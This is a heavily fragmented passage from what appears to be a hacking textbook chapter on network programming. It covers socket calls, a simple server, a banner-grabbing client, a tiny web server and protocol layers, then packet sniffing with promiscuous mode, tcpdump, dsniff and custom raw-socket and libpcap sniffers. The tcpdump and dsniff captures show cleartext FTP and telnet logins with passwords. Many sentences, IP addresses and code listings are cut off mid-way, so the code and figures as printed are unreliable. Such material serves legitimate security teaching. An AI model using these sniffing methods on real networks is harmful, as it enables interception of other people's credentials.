listen(int fd, int backlog_queue_size)

Listens for incoming connections and queues connection requests up to
backlog_queue_size
...

accept(int fd, struct sockaddr *remote_host, socklen_t *addr_length)

Accepts an incoming connection on a bound socket
...
This function
returns a new socket file descriptor to identify the connected socket or -1 on
error
...

recv(int fd, void *buffer, size_t n, int flags)

Receives n bytes from socket fd into *buffer; returns the number of bytes
received or -1 on error
...
The domain refers to the protocol family
of the socket
...
25 (when you are being a gigantic nerd)
...
h, which is automatically included from
sys/socket
...

From /usr/include/bits/socket
...
*/
#define PF_UNSPEC 0 /* Unspecified
...
*/
#define PF_UNIX PF_LOCAL /* Old BSD name for PF_LOCAL
...
*/
#define PF_INET 2 /* IP protocol family
...
25
...
*/
#define PF_APPLETALK 5 /* Appletalk DDP
...
*/
#define PF_BRIDGE 7 /* Multiprotocol bridge
...
*/
#define PF_X25 9 /* Reserved for X
...
*/
#define PF_INET6 10 /* IP version 6
...

As mentioned before, there are several types of sockets, although stream sockets
and datagram sockets are the most commonly used
...
h
...
)

From /usr/include/bits/socket
...
*/
enum __socket_type
{
SOCK_STREAM = 1, /* Sequenced, reliable, connection-based byte streams
...
*/
#define SOCK_DGRAM SOCK_DGRAM

...
The specification allows for multiple protocols within a protocol
family, so this argument is used to select one of the protocols from the family
...
This is the case for everything we will do with sockets in this book, so
this argument will always be 0 in our examples
...
This structure is also defined in bits/socket
...

From /usr/include/bits/socket
...
*/
#include ...
*/

struct sockaddr
{
__SOCKADDR_COMMON (sa_); /* Common data: address family and length
...
*/
};

The macro for SOCKADDR_COMMON is defined in the included bits/sockaddr
...
This value defines the address
family of the address, and the rest of the structure is saved for address data
...
The possible address families
are also defined in bits/socket
...

From /usr/include/bits/socket
...
*/
#define AF_UNSPEC PF_UNSPEC
#define AF_LOCAL PF_LOCAL
#define AF_UNIX PF_UNIX
#define AF_FILE PF_FILE
#define AF_INET PF_INET
#define AF_AX25 PF_AX25
#define AF_IPX PF_IPX
#define AF_APPLETALK PF_APPLETALK
#define AF_NETROM PF_NETROM
#define AF_BRIDGE PF_BRIDGE
#define AF_ATMPVC PF_ATMPVC
#define AF_X25 PF_X25
#define AF_INET6 PF_INET6

...
These structures are also the same size,
so they can be typecast to and from each other
...
25
...

In this book we are going to deal with Internet Protocol version 4, which is the
protocol family PF_INET, using the address family AF_INET
...
h file
...
h
/* Structure describing an Internet socket address
...
*/

struct in_addr sin_addr; /* Internet address
...
*/
unsigned char sin_zero[sizeof (struct sockaddr) - __SOCKADDR_COMMON_SIZE - sizeof (in_port_t) - sizeof (struct in_addr)];
};

The SOCKADDR_COMMON part at the top of the structure is simply the unsigned short
int mentioned above, which is used to define the address family
...
The port number is a 16-bit short, while the
in_addr structure used for the Internet address contains a 32-bit number
...
This space isn't used for anything, but must be saved so the structures
can be interchangeably typecast
...

Network Byte Order
The port number and IP address used in the AF_INET socket address structure are
expected to follow the network byte ordering, which is big-endian
...

There are several functions specifically for these conversions, whose prototypes
are defined in the netinet/in
...
h include files
...

Internet Address Conversion
When you see 12
...
110
...
This familiar dotted-number notation is a common way to specify
Internet addresses, and there are functions to convert this notation to and from a
32-bit integer in network byte order
...
h include file, and the two most useful conversion functions are:
inet_aton(char *ascii_addr, struct in_addr *network_addr)

ASCII to Network
This function converts an ASCII string containing an IP address in
dotted-number format into an in_addr structure, which, as you remember, only
contains a 32-bit integer representing the IP address in network byte order
...
It is passed a pointer to an in_addr
structure containing an IP address, and the function returns a character
pointer to an ASCII string containing the IP address in dotted-number format
...

A Simple Server Example
The best way to show how these functions are used is by example
...
When a client connects, it
sends the message Hello, world! and then receives data until the connection is
closed
...
A
useful memory dump function has been added to hacking
...

Added to hacking
...

if(((i%16)==15) || (i==length-1)) {
for(j=0; j < 15-(i%16); j++)
printf(" ");
printf("| ");
for(j=(i-(i%16)); j <= i; j++) { // Display printable bytes from line
...
");
}
printf("\n"); // End of the dump line (each line is 16 bytes)
} // End if
} // End for
}

This function is used to display packet data by the server program
...
h, instead
...

simple_server
...
h>
#include ...
h>
#include ...
h>
#include ...
h"
#define PORT 7890 // The port users will be connecting to
int main(void) {
int sockfd, new_sockfd; // Listen on sockfd, new connection on new_sockfd
struct sockaddr_in host_addr, client_addr; // My address information
socklen_t sin_size;
int recv_length=1, yes=1;
char buffer[1024];
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
fatal("in socket");

if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
fatal("setting socket option SO_REUSEADDR");

So far, the program sets up a socket using the socket() function
...
The final protocol argument is 0, since there is
only one protocol in the PF_INET protocol family
...

The setsockopt() function is simply used to set socket options
...
Without this option set, when the program tries to bind to a
given port, it will fail if that port is already in use
...

The first argument to this function is the socket (referenced by a file descriptor),
the second specifies the level of the option, and the third specifies the option
itself
...

There are many different socket options defined in /usr/include/asm/socket
...
The
final two arguments are a pointer to the data that the option should be set to and
the length of that data
...
This allows the functions to
handle all sorts of data, from single bytes to large data structures
...

host_addr
...
sin_port = htons(PORT); // Short, network byte order
host_addr
...
s_addr = 0; // Automatically fill with my IP
...
sin_zero), '\0', 8); // Zero the rest of the struct
...
The
address family is AF_INET, since we are using IPv4 and the sockaddr_in structure
...
This short integer value must be
converted into network byte order, so the htons() function is used
...
Since the value 0 is the same regardless of byte order, no conversion is
necessary
...
This call will bind the socket to the current IP
address on port 7890
...
The listen()
function places all incoming connections into a backlog queue until an accept()
call accepts the connections
...

while(1) { // Accept loop
...
sin_addr), ntohs(client_addr
...
The accept() function's first
two arguments should make sense immediately; the final argument is a pointer to
the size of the address structure
...
For our purposes, the size never changes,
but to use the function we must obey the calling convention
...
This
way, the original socket file descriptor can continue to be used for accepting new
connections, while the new socket file descriptor is used for communicating with
the connected client
...

The send() function sends the 13 bytes of the string Hello, world!\n to the new
socket that describes the new connection
...

Next is a loop that receives data from the connection and prints it out
...
The function writes the data into the buffer passed to it and returns the
number of bytes it actually wrote
...

When compiled and run, the program binds to port 7890 of the host and waits for
incoming connections:
reader@hacking:~/booksrc $ gcc simple_server
...
/a
...

From a Remote Machine
matrix@euclid:~ $ telnet 192
...
42
...
168
...
248
...
168
...
248
...

Hello, world!
this is a test
fjsghau;ehg;ihskjfhasdkfjhaskjvhfdkjhvbkjgf

Upon connection, the server sends the string Hello, world!, and the rest is the
local character echo of me typing this is a test and a line of keyboard
mashing
...
Back on the server side, the output shows the
connection and the packets of data that are sent back
...
/a
...
168
...
1 port 56971
RECV: 16 bytes
74 68 69 73 20 69 73 20 61 20 74 65 73 74 0d 0a | this is a test
...

A Web Client Example
The telnet program works well as a client for our server, so there really isn't much
reason to write a specialized client
...
Every time you use a
web browser, it makes a connection to a webserver somewhere
...
By default, webservers run on port 80,
which is listed along with many other default ports in /etc/services
...
At this
layer, all of the networking details have already been taken care of by the lower
layers, so HTTP uses plaintext for its structure
...
Since these are standard protocols, they are all well documented and
easily researched
...
There's no need
to be fluent, but knowing a few important phrases will help you when traveling to
foreign servers
...
For example,
GET / HTTP/1
...
0
...
html
...
If the command HEAD is used instead
of GET, it will only return the HTTP headers without the content
...
These headers
can be retrieved manually using telnet by connecting to port 80 of a known
website, then typing HEAD / HTTP/1
...
In the output
below, telnet is used to open a TCP/IP connection to the webserver at
http://www
...
net
...

reader@hacking:~/booksrc $ telnet www
...
net 80
Trying 208
...
188
...

Connected to www
...
net
...

HEAD / HTTP/1
...
1 200 OK
Date: Fri, 14 Sep 2007 05:34:14 GMT
Server: Apache/2
...
52 (CentOS)
Accept-Ranges: bytes
Content-Length: 6743
Connection: close
Content-Type: text/html; charset=UTF-8
Connection closed by foreign host
...
0
...
This can be useful for profiling, so let's write a program that
automates this manual process
...
Since the
standard socket functions aren't very friendly, let's write some functions to send
and receive data
...
h
...
The send_string()
function accepts a socket and a string pointer as arguments and makes sure the
entire string is sent out over the socket
...

You may have noticed that every packet the simple server received ended with
the bytes 0x0D and 0x0A
...
The HTTP protocol also expects lines to
be terminated with these two bytes
...

reader@hacking:~/booksrc $ man ascii | egrep "Hex|0A|0D"
Reformatting ascii(7), please wait
...
It reads from the socket
passed as the first argument into a buffer that the second argument points to
...
Then it terminates the string and exits the
function
...
They are listed below in a new include file called
hacking-network
...

hacking-network
...
The function will make sure all the bytes of the
* string are sent
...

*/
int send_string(int sockfd, unsigned char *buffer) {
int sent_bytes, bytes_to_send;
bytes_to_send = strlen(buffer);
while(bytes_to_send > 0) {
sent_bytes = send(sockfd, buffer, bytes_to_send, 0);
if(sent_bytes == -1)
return 0; // Return 0 on send error
...

}
/* This function accepts a socket FD and a ptr to a destination
* buffer
...
The EOL bytes are read from the socket, but
* the destination buffer is terminated before these bytes
...

*/
int recv_line(int sockfd, unsigned char *dest_buffer) {
#define EOL "\r\n" // End-of-line byte sequence
#define EOL_SIZE 2
unsigned char *ptr;
int eol_matched = 0;
ptr = dest_buffer;
while(recv(sockfd, ptr, 1, 0) == 1) { // Read a single byte
...

return strlen(dest_buffer); // Return bytes received
}
} else {
eol_matched = 0;
}
ptr++; // Increment the pointer to the next byte
...

}

Making a socket connection to a numerical IP address is pretty simple but named
addresses are commonly used for convenience
...
internic
...
0
...
161
...

Naturally, there are socket-related functions and structures specifically for
hostname lookups via DNS
...
h
...

The hostent structure is filled with information from the lookup, including the
numerical IP address as a 32-bit integer in network byte order
...
This structure is shown below, as listed in netdb
...

From /usr/include/netdb
...
*/
struct hostent
{
char *h_name; /* Official name of host
...
*/
int h_addrtype; /* Host address type
...
*/
char **h_addr_list; /* List of addresses from name server
...
*/
};

The following code demonstrates the use of the gethostbyname() function
...
c
#include ...
h>
#include ...
h>
#include ...
h>
#include ...
h"
int main(int argc, char *argv[]) {
struct hostent *host_info;
struct in_addr *address;
if(argc < 2) {
printf("Usage: %s <hostname>\n", argv[0]);
exit(1);
}
host_info = gethostbyname(argv[1]);

if(host_info == NULL) {
printf("Couldn't lookup %s\n", argv[1]);
} else {
address = (struct in_addr *) (host_info->h_addr);
printf("%s has address %s\n", argv[1], inet_ntoa(*address));
}
}

This program accepts a hostname as its only argument and prints out the IP
address
...
A pointer to this element is
typecast into an in_addr pointer, which is later dereferenced for the call to
inet_ntoa(), which expects an in_addr structure as its argument
...

reader@hacking:~/booksrc $ gcc -o host_lookup host_lookup
...
/host_lookup www
...
net
www
...
net has address 208
...
188
...
/host_lookup www
...
com
www
...
com has address 74
...
19
...

webserver_id
...
h>
#include ...
h>
#include ...
h>
#include ...
h>

#include "hacking
...
h"
int main(int argc, char *argv[]) {
int sockfd;
struct hostent *host_info;
struct sockaddr_in target_addr;
unsigned char buffer[4096];
if(argc < 2) {
printf("Usage: %s <hostname>\n", argv[0]);
exit(1);
}
if((host_info = gethostbyname(argv[1])) == NULL)
fatal("looking up hostname");

if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
fatal("in socket");
target_addr
...
sin_port = htons(80);
target_addr
...
sin_zero), '\0', 8); // Zero the rest of the struct
...
0\r\n\r\n");
while(recv_line(sockfd, buffer)) {
if(strncasecmp(buffer, "Server:", 7) == 0) {
printf("The web server for %s is %s\n", argv[1], buffer+8);
exit(0);
}
}
printf("Server line not found\n");
exit(1);
}

Most of this code should make sense to you now
...
The connect() function is called to connect to port 80 of the target host, the
command string is sent, and the program loops reading each line into buffer
...
h
...
The first
two arguments are pointers to the strings, and the third argument is n, the
number of bytes to compare
...
When it finds it,
it removes the first eight bytes and prints the webserver version information
...

reader@hacking:~/booksrc $ gcc -o webserver_id webserver_id
...
/webserver_id www
...
net
The web server for www
...
net is Apache/2
...
52 (CentOS)
reader@hacking:~/booksrc $
...
microsoft
...
microsoft
...
0
reader@hacking:~/booksrc $

A Tinyweb Server
A webserver doesn't have to be much more complex than the simple server we
created in the previous section
...

The server code listed below is nearly identical to the simple server, except that
connection handling code is separated into its own function
...
The program
will look for the requested resource in the local directory called webroot and send
it to the browser
...
You may already be familiar with this response, which means File
Not Found
...

tinyweb
...
h>
#include ...
h>
#include ...
h>
#include ...
h>
#include ...
h"
#include "hacking-network
...
/webroot" // The web server's root directory
void handle_connection(int, struct sockaddr_in *); // Handle web requests
int get_file_size(int); // Returns the filesize of open file descriptor
int main(void) {
int sockfd, new_sockfd, yes=1;
struct sockaddr_in host_addr, client_addr; // My address information
socklen_t sin_size;
printf("Accepting web requests on port %d\n", PORT);
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
fatal("in socket");
if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
fatal("setting socket option SO_REUSEADDR");
host_addr
...
sin_port = htons(PORT); // Short, network byte order
host_addr
...
s_addr = INADDR_ANY; // Automatically fill with my IP
...
sin_zero), '\0', 8); // Zero the rest of the struct
...

sin_size = sizeof(struct sockaddr_in);
new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
if(new_sockfd == -1)
fatal("accepting connection");
handle_connection(new_sockfd, &client_addr);
}
return 0;
}
/* This function handles the connection on the passed socket from the
* passed client address
...
Finally, the
* passed socket is closed at the end of the function
...

if(ptr == NULL) { // Then this isn't valid HTTP
...

ptr = NULL; // Set ptr to NULL (used to flag for an invalid request)
...

if(strncmp(request, "HEAD ", 5) == 0) // HEAD request
ptr = request+5; // ptr is the URL
...

printf("\tUNKNOWN REQUEST!\n");
} else { // Valid request, with ptr pointing to the resource name
if (ptr[strlen(ptr) - 1] == '/') // For resources ending with '/',
strcat(ptr, "index
...
html' to the end
...

fd = open(resource, O_RDONLY, 0); // Try to open the file
...
0 404 NOT FOUND\r\n");
send_string(sockfd, "Server: Tiny webserver\r\n\r\n");
send_string(sockfd, "<html><head><title>404 Not Found</title></head>");
send_string(sockfd, "<body><h1>URL not found</h1></body></html>\r\n");
} else { // Otherwise, serve up the file
...
0 200 OK\r\n");
send_string(sockfd, "Server: Tiny webserver\r\n\r\n");
if(ptr == request + 4) { // Then this is a GET request
if( (length = get_file_size(fd)) == -1)
fatal("getting resource file size");
if( (ptr = (unsigned char *) malloc(length)) == NULL)
fatal("allocating memory for reading resource");
read(fd, ptr, length); // Read the file into memory
...

free(ptr); // Free file memory
...

} // End if block for file found/not found
...

} // End if block for valid HTTP
...

}
/* This function accepts an open file descriptor and returns
* the size of the associated file
...

*/
int get_file_size(int fd) {
struct stat stat_struct;

if(fstat(fd, &stat_struct) == -1)
return -1;
return (int) stat_struct
...
The strstr() function returns a pointer to
the substring, which will be right at the end of the request
...
A HEAD request will just return the headers, while a GET request will also
return the requested resource (if it can be found)
...
html and image
...
Root
privileges are needed to bind to any port below 1024, so the program is setuid
root and executed
...
0
...
1:
reader@hacking:~/booksrc $ ls -l webroot/
total 52
-rwxr--r-- 1 reader reader 46794 2007-05-28 23:43 image
...
html
reader@hacking:~/booksrc $ cat webroot/index
...
and here is some sample text

...
jpg">

reader@hacking:~/booksrc $ gcc -o tinyweb tinyweb
...
/tinyweb
reader@hacking:~/booksrc $ sudo chmod u+s
...
/tinyweb
Accepting web requests on port 80
Got request from 127
...
0
...
1"
Opening '
...
html' 200 OK
Got request from 127
...
0
...
jpg HTTP/1
...
/webroot/image
...
0
...
1:52998 "GET /favicon
...
1"
Opening '
...
ico' 404 Not Found

The address 127
...
0
...
The initial request gets index
...
jpg
...
ico in
an attempt to retrieve an icon for the web page
...

Figure 0x400-3
...
At the upper layers of OSI,
many protocols can be plaintext since all the other details of the connection are
already taken care of by the lower layers
...
TCP on the
transport layer (4) provides reliability and transport control, while IP on the
network layer (3) provides addressing and packet-level communication
...
At the bottom, the physical
layer (1) is simply the wire and the protocol used to send bits from one device to
another
...

This process can be thought of as an intricate interoffice bureaucracy,
reminiscent of the movie Brazil
...
As
data packets are transmitted, each receptionist performs the necessary duties of
her particular layer, puts the packet in an interoffice envelope, writes the header
on the outside, and passes it on to the receptionist at the next layer below
...

Network traffic is a chattering bureaucracy of servers, clients, and peer-to-peer
connections
...
Regardless of what the packets contain, the protocols used at
the lower layers to move the data from point A to point B are usually the same
...

Data-Link Layer
The lowest visible layer is the data-link layer
...
This layer provides a way to address and
send messages to anyone else in the office, as well as to figure out who's in the
office
...
These addresses are known as Media Access Control (MAC)
addresses
...
These
addresses are also sometimes referred to as hardware addresses, since each
address is unique to a piece of hardware and is stored in the device's integrated
circuit memory
...

An Ethernet header is 14 bytes in size and contains the source and destination
MAC addresses for this Ethernet packet
...
Any
Ethernet packet sent to this address will be sent to all the connected devices
...
The concept of IP addresses doesn't exist at this level, only
hardware addresses do, so a method is needed to correlate the two addressing
schemes
...
In Ethernet, the method is known as Address
Resolution Protocol (ARP)
...
There are four different types of ARP messages, but the two
most important types are ARP request messages and ARP reply messages
...
This type is used
to specify whether the packet is an ARP-type message or an IP packet
...
" An ARP reply is the
corresponding response that is sent to the requester's MAC address (and IP
address) saying, "This is my MAC address, and I have this IP address
...

These caches are like the interoffice seating chart
...
10
...
20 and MAC address
00:00:00:aa:aa:aa, and another system on the same network has the IP address
10
...
10
...

Figure 0x400-4
...
10
...
50, the first system will first check its ARP cache
to see if an entry exists for 10
...
10
...
Since this is the first time these two
systems are trying to communicate, there will be no such entry, and an ARP
request will be sent out to the broadcast address, saying, "If you are 10
...
10
...
" Since this request uses the
broadcast address, every system on the network sees the request, but only the
system with the corresponding IP address is meant to respond
...
10
...
50 and I'm at 00:00:00:bb:bb:bb
...

Network Layer
The network layer is like a worldwide postal service providing an addressing and
delivery method used to send things everywhere
...

Every system on the Internet has an IP address, consisting of a familiar four-byte
arrangement in the form of xx
...
xx
...
The IP header for packets in this layer is
20 bytes in size and consists of various fields and bitflags as defined in RFC 791
...
SPECIFICATION
3
...
Internet Header Format
A summary of the contents of the internet header follows:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL |Type of Service| Total Length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Time to Live | Protocol | Header Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Options | Padding |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Example Internet Datagram Header

Figure 4
...

This surprisingly descriptive ASCII diagram shows these fields and their positions
in the header
...
Similar to the
Ethernet header, the IP header also has a protocol field to describe the type of
data in the packet and the source and destination addresses for routing
...

The Internet Protocol is mostly used to transmit packets wrapped in higher layers
...
ICMP packets are used for messaging and diagnostics
...
If there's a problem, an ICMP packet is sent back to notify the
sender of the problem
...
ICMP Echo Request and Echo
Reply messages are used by a utility called ping
...
Upon receipt of the ICMP Echo Request, the remote host sends
back an ICMP Echo Reply
...
However, it is important to remember
that ICMP and IP are both connectionless; all this protocol layer really cares about
is getting the packet to its destination address
...
IP can deal with this situation by fragmenting packets,
as shown here
...

The packet is broken up into smaller packet fragments that can pass through the
network link, IP headers are put on each fragment, and they're sent off
...

When the destination receives these fragments, the offset values are used to
reassemble the original IP packet
...
This is the job of the protocols
at the transport layer
...
If a customer wants to return a
defective piece of merchandise, they send a message requesting a Return
Material Authorization (RMA) number
...
The post office is only concerned with
sending these messages (and packages) back and forth, not with what's in them
...
TCP is the most commonly used protocol for
services on the Internet: telnet, HTTP (web traffic), SMTP (email traffic), and FTP
(file transfers) all use TCP
...
Stream sockets use TCP/IP connections
...
Reliability simply means that
TCP will ensure that all the data will reach its destination in the proper order
...
If
some packets in the middle of a connection are lost, the destination will hold on to
the packets it has while the source retransmits the missing packets
...
The TCP flags are as follows:
TCP flag  Meaning         Purpose
URG       Urgent          Identifies important data
ACK       Acknowledgment  Acknowledges a packet; it is turned on for the majority of the connection
PSH       Push            Tells the receiver to push the data through instead of buffering it
RST       Reset           Resets a connection
SYN       Synchronize     Synchronizes sequence numbers at the beginning of a connection
FIN       Finish          Gracefully closes a connection when both sides say goodbye

These flags are stored in the TCP header along with the source and destination
ports
...

From RFC 793

[Page 14]
September 1981
Transmission Control Protocol
3
...
1
...
The Internet Protocol
header carries several information fields, including the source and
destination host addresses [2]
...
This
division allows for the existence of host level protocols other than
TCP
...

Figure 3
...

The SYN and ACK flags are used together to open connections in a three-step
handshaking process
...
The server
then responds with a packet that has both the SYN and ACK flags turned on
...
After that, every packet in the connection will have the ACK flag
turned on and the SYN flag turned off
...

Figure 0x400-6
...

When a connection is initiated, each side generates an initial sequence number
...
Then, with each packet that is sent, the sequence number
is incremented by the number of bytes found in the data portion of the packet
...
In addition, each
TCP header has an acknowledgment number, which is simply the other side's
sequence number plus one
...
However, the cost of this functionality is paid in communication
overhead
...
This lack of
functionality makes it behave much like the IP protocol: It is connectionless and
unreliable
...
Sometimes connections aren't needed, and the lightweight UDP is a much
better protocol for these situations
...
It only contains four 16-bit values in this order: source port,
destination port, length, and checksum
...
On an unswitched network, Ethernet packets pass through every device on
the network, and each device is expected to look only at the packets sent to its
own address
...
Most
packet-capturing programs, such as tcpdump, drop the device they are listening
to into promiscuous mode by default
...

reader@hacking:~/booksrc $ ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:0C:29:34:61:65
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:17115 errors:0 dropped:0 overruns:0 frame:0
TX packets:1927 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4602913 (4
...
2 KiB)
Interrupt:16 Base address:0x2024
reader@hacking:~/booksrc $ sudo ifconfig eth0 promisc
reader@hacking:~/booksrc $ ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:0C:29:34:61:65
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX packets:17181 errors:0 dropped:0 overruns:0 frame:0
TX packets:1927 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4668475 (4
...
2 KiB)
Interrupt:16 Base address:0x2024
reader@hacking:~/booksrc $

The act of capturing packets that aren't necessarily meant for public viewing is
called sniffing
...

reader@hacking:~/booksrc $ sudo tcpdump -l -X 'ip host 192
...
0
...
684964 192
...
0
...
ftp > 192
...
0
...
32778: P 1:42(41) ack 1 win
17316 (DF)
0x0000 4500 005d e065 4000 8006 97ad c0a8 0076 E
...
v
0x0010 c0a8 00c1 0015 800a 292e 8a73 5ed4 9ce8
...

0x0020 8018 43a4 a12f 0000 0101 080a 0007 1f78
...
x
0x0030 000e 0a8a 3232 3020 5459 5053 6f66 7420
...
TYPSoft
...
Server
...
99
...
685132 192
...
0
...
32778 > 192
...
0
...
ftp:
...
4
...

0x0010 c0a8 0076 800a 0015 5ed4 9ce8 292e 8a9c
...

0x0020 8010 16d0 81db 0000 0101 080a 000e 0c56
...
x
21:27:52
...
168
...
193
...
168
...
118
...
p@
...
v
...
Z
0x0030 0007 1f78 5553 4552 206c 6565 6368 0d0a
...
leech
...
415487 192
...
0
...
ftp > 192
...
0
...
32778: P 42:76(34) ack 13
win 17304 (DF)
0x0000 4500 0056 e0ac 4000 8006 976d c0a8 0076 E
...
m
...

0x0020 8018 4398 4e2c 0000 0101 080a 0007 1fc5
...
N,
...
Z331
...
required
...
le
0x0050 6563 ec
21:27:52
...
168
...
193
...
168
...
118
...
ack 76 win 5840
(DF) [tos 0x10]
0x0000 4510 0034 9671 4000 4006 21bb c0a8 00c1 E
...
q@
...
v
...
[
0x0030 0007 1fc5
...
155458 192
...
0
...
32778 > 192
...
0
...
ftp: P 13:27(14) ack 76
win 5840 (DF) [tos 0x10]
0x0000 4510 0042 9672 4000 4006 21ac c0a8 00c1 E
...
r@
...
v
...

0x0030 0007 1fc5 5041 5353 206c 3840 6e69 7465
...
l8@nite
0x0040 0d0a
...
179427 192
...
0
...
ftp > 192
...
0
...
32778: P 76:103(27) ack 27
win 17290 (DF)
0x0000 4500 004f e0cc 4000 8006 9754 c0a8 0076 E
...
T
...

0x0020 8018 438a 4c8c 0000 0101 080a 0007 1feb
...
L
...
230
...
lee
0x0040 6368 206c 6f67 6765 6420 696e 2e0d 0a ch
...
in
...
In the preceding example, the user leech is seen logging into an
FTP server using the password l8@nite
...

tcpdump is a wonderful, general-purpose packet sniffer, but there are specialized
sniffing tools designed specifically to search for usernames and passwords
...

reader@hacking:~/booksrc $ sudo dsniff -n
dsniff: listening on eth0
----------------12/10/02 21:43:21 tcp 192
...
0
...
32782 -> 192
...
0
...
21 (ftp)
USER leech
PASS l8@nite
----------------12/10/02 21:47:49 tcp 192
...
0
...
32785 -> 192
...
0
...
23 (telnet)
USER root
PASS 5eCr3t

Raw Socket Sniffer

So far in our code examples, we have been using stream sockets
...
When a program works at the session (5) layer of the OSI model, the operating system
takes care of all of the lower-level details of transmission, correction, and routing
...
At this lower
layer, all the details are exposed and must be handled explicitly by the
programmer
...
In this
case, the protocol matters since there are multiple options
...
The following example is a TCP
sniffing program using raw sockets
...
c
#include ...
h>
#include ...
h>
#include ...
h>
#include "hacking
...
Notice that buffer is declared as a
u_char variable
...
h that
expands to "unsigned char
...

When compiled, the program needs to be run as root, because the use of raw
sockets requires root access
...

reader@hacking:~/booksrc $ gcc -o raw_tcpsniff raw_tcpsniff
...
/raw_tcpsniff
[!!] Fatal Error in socket: Operation not permitted
reader@hacking:~/booksrc $ sudo
...
D
...
F#
...
l
...
2G
...
;e
...

Got a 70 byte packet
45 10 00 46 1e 37 40 00 40 06 46 20 c0 a8 2a 01 | E
...
7@
...

c0 a8 2a f9 8b 12 1e d2 ac 14 cf a2 e5 10 6c c9 |
...

80 18 05 b4 27 95 00 00 01 01 08 0a 26 ab a0 75 |
...
(AAAAAAAAAAAA
41 41 41 41 0d 0a | AAAA
...
G
...
F
...
l
...
hE
...
fjsdalkfjask
66 6a 61 73 64 0d 0a | fjasd
...
Also, it only captures TCP packets
—to capture UDP or ICMP packets, additional raw sockets need to be opened for
each
...
Raw socket code for Linux most likely won't work
on BSD or Solaris
...

libpcap Sniffer
A standardized programming library called libpcap can be used to smooth out the
inconsistencies of raw sockets
...
Both tcpdump and dsniff use libpcap, which allows them to
compile with relative ease on any platform
...
These functions are
quite intuitive, so we will discuss them using the following code listing
...
c
#include ...
h"
void pcap_fatal(const char *failed_in, const char *errbuf) {
printf("Fatal Error in %s: %s\n", failed_in, errbuf);
exit(1);
}

First, pcap
...
Also, I've written a pcap_fatal() function for displaying fatal
errors
...

int main() {
struct pcap_pkthdr header;
const u_char *packet;

char errbuf[PCAP_ERRBUF_SIZE];
char *device;
pcap_t *pcap_handle;
int i;

The errbuf variable is the aforementioned error buffer, its size coming from a
define in pcap
...
The header variable is a pcap_pkthdr structure
containing extra capture information about the packet, such as when it was
captured and its length
...

device = pcap_lookupdev(errbuf);
if(device == NULL)
pcap_fatal("pcap_lookupdev", errbuf);
printf("Sniffing on device %s\n", device);

The pcap_lookupdev() function looks for a suitable device to sniff on
...
For our system
this will always be /dev/eth0, although it will be different on a BSD system
...

pcap_handle = pcap_open_live(device, 4096, 1, 0, errbuf);
if(pcap_handle == NULL)
pcap_fatal("pcap_open_live", errbuf);

Similar to the socket function and file open function, the pcap_open_live()
function opens a packet-capturing device, returning a handle to it
...
Since we want to capture
in promiscuous mode, the promiscuous flag is set to 1
...
len);
dump(packet, header
...
This
function is passed the pcap_handle and a pointer to a pcap_pkthdr structure so it
can fill it with details of the capture
...
Then
pcap_close() closes the capture interface
...
This can be
done using the -l flag with GCC, as shown in the output below
...

reader@hacking:~/booksrc $ gcc -o pcap_sniff pcap_sniff
...
o: In function `main':
pcap_sniff
...
text+0x1c8): undefined reference to `pcap_lookupdev'
pcap_sniff
...
text+0x233): undefined reference to `pcap_open_live'

pcap_sniff
...
text+0x282): undefined reference to `pcap_next'
pcap_sniff
...
text+0x2c2): undefined reference to `pcap_close'
collect2: ld returned 1 exit status
reader@hacking:~/booksrc $ gcc -o pcap_sniff pcap_sniff
...
/pcap_sniff
Fatal Error in pcap_lookupdev: no suitable device found
reader@hacking:~/booksrc $ sudo
...
l
...
e
...

00 44 1e 39 40 00 40 06 46 20 c0 a8 2a 01 c0 a8 |
...
9@
...

2a f9 8b 12 1e d2 ac 14 cf c7 e5 10 6c c9 80 18 | *
...

05 b4 54 1a 00 00 01 01 08 0a 26 b6 a7 76 02 3c |
...
v
...
this is a test
0d 0a |
...
e
...
P
...

00 34 3d 2c 40 00 40 06 27 4d c0 a8 2a f9 c0 a8 |
...
'M
...
l
...
G'l&
...
v
Got a 84 byte packet
00 01 6c eb 1d 50 00 01 29 15 65 b6 08 00 45 10 |
...
P
...
E
...
F
...

2a f9 8b 12 1e d2 ac 14 cf d7 e5 10 6c c9 80 18 | *
...

05 b4 11 b3 00 00 01 01 08 0a 26 b6 a9 c8 02 47 |
...

reader@hacking:~/booksrc $

Notice that there are many bytes preceding the sample text in the packet and
many of these bytes are similar
...

Decoding the Layers
In our packet captures, the outermost layer is Ethernet, which is also the lowest
visible layer
...
The header for this layer contains the source MAC address, the
destination MAC address, and a 16-bit value that describes the type of Ethernet
packet
...
h and the structures for the IP header and TCP
header are located in /usr/include/netinet/ip
...
h,
